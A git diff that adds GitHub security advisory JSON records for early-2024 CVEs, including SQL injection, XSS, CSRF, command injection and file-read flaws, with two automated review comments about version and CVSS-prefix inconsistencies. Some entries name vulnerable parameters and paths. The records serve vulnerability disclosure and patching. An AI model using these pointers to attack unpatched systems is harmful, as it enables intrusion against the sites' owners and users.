@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c866-8gpw-p3mv",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-1329"
+ ],
+ "details": "HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3 template renderer is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. Fixed in Nomad 1.7.4, 1.6.7, 1.5.14.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-610"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T20:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json b/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json
new file mode 100644
index 0000000000000..d3304c1833666
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c8h3-85xm-jxp3",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-02-05T21:30:31Z",
+ "aliases": [
+ "CVE-2023-27318"
+ ],
+ "details": "StorageGRID (formerly StorageGRID Webscale) versions 11.6.0 through \n11.6.0.13 are susceptible to a Denial of Service (DoS) vulnerability. A \nsuccessful exploit could lead to a crash of the Local Distribution \nRouter (LDR) service.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27318"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/NTAP-20240202-0012/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-248"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T21:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json b/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json
new file mode 100644
index 0000000000000..56a144c84ba74
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cc2v-m8qh-5gfq",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2024-21750"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scribit Shortcodes Finder allows Reflected XSS.This issue affects Shortcodes Finder: from n/a through 1.5.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21750"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json b/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json
new file mode 100644
index 0000000000000..8485f3240ef6a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json
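Review bot: The `details` text gives the affected range as "from n/a through 1.5.5", but the only vendor-side reference in `references` is a Patchstack URL whose slug names the plugin version as `1-5-4`, so the two sources in this record disagree on the last affected version. Nothing in the hunk resolves which is correct, and `affected` is still empty, so whoever later encodes a `fixed` event for this advisory should settle the version against the Patchstack page before choosing between 1.5.5 and 1.5.6. Presumably the NVD text is the newer of the two, but that cannot be confirmed from this hunk.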
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ccj9-9hx6-vgjf",
+ "modified": "2024-02-07T18:30:28Z",
+ "published": "2024-02-07T18:30:28Z",
+ "aliases": [
+ "CVE-2024-20255"
+ ],
+ "details": "A vulnerability in the SOAP API of Cisco Expressway Series and Cisco TelePresence Video Communication Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.\n\n This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the REST API to follow a crafted link. A successful exploit could allow the attacker to cause the affected system to reload.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20255"
+ },
+ {
+ "type": "WEB",
+ "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json b/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json
new file mode 100644
index 0000000000000..1049a8293bb81
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ccx2-385m-5g4m",
+ "modified": "2024-02-07T03:30:33Z",
+ "published": "2024-02-07T03:30:33Z",
+ "aliases": [
+ "CVE-2024-22022"
+ ],
+ "details": "Vulnerability CVE-2024-22022 allows a Veeam Recovery Orchestrator user that has been assigned a low-privileged role to access the NTLM hash of the service account used by the Veeam Orchestrator Server Service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22022"
+ },
+ {
+ "type": "WEB",
+ "url": "https://veeam.com/kb4541"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json b/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json
new file mode 100644
index 0000000000000..d6480ec93ae2e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json
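Review bot: The `score` string here carries the `CVSS:3.0` prefix while every other scored entry in this batch uses `CVSS:3.1`, so any consumer that keys its parser on the vector prefix will treat this record differently from its neighbours. The metric values are identical under both versions for this vector, so the `"severity": "HIGH"` in `database_specific` is consistent either way; this reads as a provenance artefact of the vendor-supplied score rather than an import error. It would be worth a comment in the importer documentation that both 3.0 and 3.1 prefixes are expected under `CVSS_V3`, since the `type` field does not distinguish them.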
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cf6q-mwq5-j3p8",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0709"
+ ],
+ "details": "The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0709"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json b/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json
new file mode 100644
index 0000000000000..77a6c0759a837
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cf78-r42v-cqjp",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-1121"
+ ],
+ "details": "The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1121"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json b/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json
new file mode 100644
index 0000000000000..be294396cbcd6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cffx-cf3x-mr9h/GHSA-cffx-cf3x-mr9h.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cffx-cf3x-mr9h",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43536"
+ ],
+ "details": "Transient DOS while parse fils IE with length equal to 1.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43536"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json b/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json
new file mode 100644
index 0000000000000..2d9885a0d00e7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cgc5-3h4x-24c6/GHSA-cgc5-3h4x-24c6.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cgc5-3h4x-24c6",
+ "modified": "2024-02-02T06:30:31Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2024-1073"
+ ],
+ "details": "The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1073"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T05:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json b/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json
new file mode 100644
index 0000000000000..a3b59a6ec48d9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-ch4v-95r5-xc38/GHSA-ch4v-95r5-xc38.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ch4v-95r5-xc38",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-24161"
+ ],
+ "details": "MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24161"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wy876/cve/issues/2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-552"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json b/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json
new file mode 100644
index 0000000000000..3efc2c90b2173
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-chj3-8q43-rcc8/GHSA-chj3-8q43-rcc8.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-chj3-8q43-rcc8",
+ "modified": "2024-02-07T15:30:47Z",
+ "published": "2024-02-05T15:30:23Z",
+ "aliases": [
+ "CVE-2024-23108"
+ ],
+ "details": "An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23108"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fortiguard.com/psirt/FG-IR-23-130"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T14:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json b/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json
new file mode 100644
index 0000000000000..48369b05be447
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cj8g-f3w9-gg24/GHSA-cj8g-f3w9-gg24.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cj8g-f3w9-gg24",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41292"
+ ],
+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41292"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-46"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json b/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json
new file mode 100644
index 0000000000000..2a6a54eb08122
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cm2j-xhch-gm5q/GHSA-cm2j-xhch-gm5q.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cm2j-xhch-gm5q",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-7029"
+ ],
+ "details": "The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including 9.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 9.7.6.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7029"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3024075/maxbuttons"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bca0e8a0-d837-42d8-a9d3-35e0c820eb43?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json
new file mode 100644
index 0000000000000..ab3f428c9fa2c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cmx3-whxw-v8mp",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2023-50488"
+ ],
+ "details": "An issue in Blurams Lumi Security Camera (A31C) v23.0406.435.4120 allows attackers to execute arbitrary code.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50488"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/roman-mueller/PoC/tree/master/CVE-2023-50488"
+ },
+ {
+ "type": "WEB",
+ "url": "https://infosec.rm-it.de/2024/02/01/blurams-lumi-security-camera-analysis/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json b/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json
new file mode 100644
index 0000000000000..b45957e8f9ee2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-cpxr-hfmm-j69h/GHSA-cpxr-hfmm-j69h.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cpxr-hfmm-j69h",
+ "modified": "2024-02-06T18:30:20Z",
+ "published": "2024-02-06T18:30:20Z",
+ "aliases": [
+ "CVE-2024-1251"
+ ],
+ "details": "A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /general/email/outbox/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-252990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1251"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252990"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252990"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T16:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json b/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json
new file mode 100644
index 0000000000000..f7b5b6050c58e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-crhq-582w-h987/GHSA-crhq-582w-h987.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-crhq-582w-h987",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2024-22433"
+ ],
+ "details": "\nDell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22433"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-538"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T07:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json
new file mode 100644
index 0000000000000..d234e9a044dd2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-crr8-wrxj-8vg6",
+ "modified": "2024-02-07T15:30:48Z",
+ "published": "2024-02-07T15:30:48Z",
+ "aliases": [
+ "CVE-2024-24188"
+ ],
+ "details": "Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pcmacdon/jsish/issues/100"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T14:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json b/advisories/unreviewed/2024/02/GHSA-crrf-qhw3-5g49/GHSA-crrf-qhw3-5g49.json
new file mode 100644
index 0000000000000..18150e01cac2d
--- /dev/null
